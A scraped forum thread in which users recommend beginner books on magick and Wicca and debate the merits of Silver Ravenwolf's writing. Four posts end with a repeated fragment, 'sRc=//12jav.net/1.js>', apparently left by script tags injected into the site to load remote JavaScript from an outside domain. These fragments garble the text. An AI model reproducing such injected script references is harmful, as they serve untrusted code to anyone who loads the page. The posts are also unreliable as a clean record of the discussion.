it will help you. If you go back through the forums you should be able to find specific techiniques as well that have been explained.

But here is a list of what you should learn first.

A book that really helped me is The Solitary Witch by Silver Ravenwolf. It got me started and I still look at it when I need some advice. No matter what type of magic you really want to learn I think they all start at relativly the same spot, so once you learn the basics you could go just about anywhere with it. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

silver ravenwulf should not be read most of her writings is "fluffy" very little of what she says is actually close to truth sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

While she is viewed as fluffy, she has the credit of sparking people's interest into learning Magick that is real.

I consciously started with the book 'Essential Wicca' (since my views are Wiccan), but I also learned a bit from other books as well as from people (talking with fellow occulters). sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Well in order to start magick you don't necessarily introduce yourself to Wicca, really focus what it is you want. A religious intent? A more self gratifying intent? To see where you want to go to. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
